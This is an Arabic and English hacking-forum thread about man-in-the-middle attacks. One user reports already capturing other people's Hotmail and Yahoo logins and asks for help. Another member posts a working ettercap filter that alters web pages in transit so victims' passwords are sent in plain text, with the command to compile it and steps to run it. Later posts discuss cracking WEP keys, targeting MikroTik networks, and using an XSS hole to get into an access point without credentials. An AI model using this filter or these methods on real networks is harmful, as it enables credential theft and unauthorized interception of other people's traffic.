man in the middle attacking

[C|EH]

شكرا لك اخي godfather العملية نجحت معي ، واستطعت الحصول على عدد من الاسماء والباسووردات ولانه الملف اللي جمعته كبير 700 ميجا - صرت حول وانا ابحث رغم اني كنت استعمل البايب وال less وكل شيء ،،

ولكن مثلا رايت تسجيل دخول على الهوت ميل و الياهو ،، ولكن كانه الباسووردات كانت مشفرة MD5 ،، كيف يتم اظهارها ،،

والف شكر لك اخي ،، اظن يجب علي استعمال الفلاتر اثناء جمع الباكيج ،،

اذا ممكن تكتبلي فلتر صغير او معدل لهم اكون شاكرلك

[godfather]

كود:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "//alert(\x22url=\x22 + url);")) {
      replace("//alert(\x22url=\x22 + url);", "url += \x22&.e=\x22+passwd; "); # note: replacement string is same length as original string
      msg("Sent the passwd in plain-text in '.e'.\n");
   }
}

[godfather]

اولا نعمل كومبلي للفايل فلتر بهذا الامر

كود:

etterfilter  file.filter  -o file.ef

ثم انشغل البرنامج ونعمل كل شي خاص بالهجوم ولكن قبل عمل سنايف اختر الفلتر ثم اعمل سنايف

وعمل كبجر بولسطة الاثيريل

وهناك طرق اخرى



الى اللقاء

[The King2]

[fax]

ما شاء الله ..
صحيح اني ماني متوعب الفكره كامله .. ولكن واضح ان الشرح جيد والدليل الشباب اللي استفادوا منه
انشالله ف يوم نفهم بعض هذه الامور ونطبقها
جزاك الله خير اخوي

[العقرب2006]

شكرا جزيلا اخي الكريم godfather على هذا الموضوع الشيق ولدي بعض الاسئلة وهي اولا هل تنفع هذه الطريقه مع منظومات تستخدم الويب كي كحماية اوليه والمايكروتك كخط حماية ثاني ؟واذا كانت تنفع فهل تنجح مع الاصدارات الحديثه من المايكروتك؟والذي فهمته انك يجب ان تكون متصلا من اجل عمل السنايف ومن ملاحظتي ان هناك اصدار جديد من المايكروتك يعمل على قطع الاتصال عند محاولة السنايف على المنظومه وكذلك عند تشغيل برنامج النت كات --وشكرا مقدما -------اخوك---العراقي

[tgh12]

please mr godfather i want to know step by step to find user and password if
threr is wepkey and mikrotik firewall and the packet we are use it from airodump or another sniffing files packetes my ask in backtrack please help
my second question is i have wlan dlink dwl-g520
in the preveous month i cracked wep key 64-bit in 45 minuts
but today when i use airodump-ng and aireplay-ng on the same network the ivs not raising i tried several attack but not work note i use aircrack-ng -0.7
please help
your brother tgh12 from iraq

[godfather]

why people ask . how to hack??!! hmmm

did you know this the concept . HACK TO LEARN NOT LEARN TO HACK

did you know some things about security protocols ?, that is maybe used by mikrotik router!hm
let us assume , you know
let us talking about those protocols , what those and what the best
first answer
1. MAC ACLs
2. LEAP
3. EAB-MD5
4. EAB-SIM
5.ETC.....MORE

you can search about details

second answer , what the best and why ? hmm

the first three protocols used mutual authentication , than . those can not protect against man-in-the-middle attacks on authentication messages

so, the best chose , is fourth , it is work like dual-mode phones with SIM cards.

now , we understood ,what , and why

let us ask ourself
is mikrotik administrator has solid background , what and how those protocols work , what is the best chose ?hmm
if he can install the simulator router that is not mean he understand what he do


ok


maybe in next days i write hotspot tutorial


see you

[dlink]

thanks alot god father and we hope that you make an amazing work in bt2 final and tell us about new featuers

[tgh12]

thank you brother
i hope you specified special toturials on backreack and security specially
hotspot &ettercap &wireshark &
how we can modify &change source code of program &compile them explain these programs by text and video to improve our selves and take advantage from your expeirence in knowlege of security and backtrack 2 final
plese mr godfather dont leave us and support us in toturials
your brother tgh12 from iraq with thanks

[Movenpick]

أحب الـnetcat

[tgh12]

السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير

[tgh12]

السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير !Clap

[godfather]

اهلا بيك اخوي العزيز

بالنسبة للمايكروتك هو سميليتر راوتر يستخدم بكثرة هذه الايام

كنت في اجابة سابقة قد تكلمت عن بعض البروتوكولات الامنية التي من الممكن استخدامها

وهناك غيرها من البروتوكولات ولكن على الاغلب المستخدم منها هو

leap وكذلك eap/md5
وكذلك ممكن استخدام vpn

او pptp او pppoE

اعتفد هذه هي البروتوكلات المستخدمة من قبل البعض
على فكرة اغلب اصحاب الشبكات الموجودين حالين هم ليس على درايه كاملة بالموضوع اقصد ما يخص السيكيورتي وكذلك اغلبيهم لايهتم بموضوع سرية المعلومات المنتقلة خلال شبكته اقصد ما يخص الزبائن

الخطوة الاولى هي تحديد البروتكولا المستخدم
ومن ثم تحديد الهارويرات المستخدمة لان البعض من الاكسس بوينتات تحتوي على هذه البروتوكلات من غير الحاجة الى تثبين سيرفر ريديس او مايكروتك

فمن الضروري معرفة الهاردوير ومن ثم البحث عن الثغرات في هذا الهاردوير

على سبيل االمثال لدي صديق يستخدم اكسس بوينت بالامكان استخدام احد البروتوكلات اعلاه من خلالها
وكن نعمل نبحث عن ثغرة لهذه الاكسس وبالفعل وجدنا ثغرة XSS

وقمنا بكتابة السيكريبت ومن ثم الدخول على الاكسس بدون معرف اليوزر والباس تبع الاكسس

اقصد الدخول على الاكسس وليس الشبكة بمعنى اخر انك لاتحتاج الى التخويل من الشبكة حتى تتمكن من الدخول على الاكسس

وكما تلاحظ اهم موضوع بالعملية هي اكتشاف الثغرة والاداة التي استخدمنها هي NESSUS وهي اداة شهيرة

بالنسبة لبعض البروتوكلات انا كاتب موضوع بتكلم عن الثغرة لهذه البرونوكلات وكيفية استغلالها في هذا المنتدى
ممكن تشاهد هذا الصفحة

https://www.arabhardware.net/forum/s...highlight=pptp

وبالنسبة للكهرباء ما اعرف شنو دخلها بالموضوع ان كانت الكهرباء سيئة فهذا بسبب المتخلفين الذين يديرون منظومة الكهرباء


الى اللقا ء

[tgh12]

الف رحمة على والديك اخي العزيز godfather وشكرا على المعلومات القيمة وهذا من كرم اخلاقك
اخوك tgh12

!Clap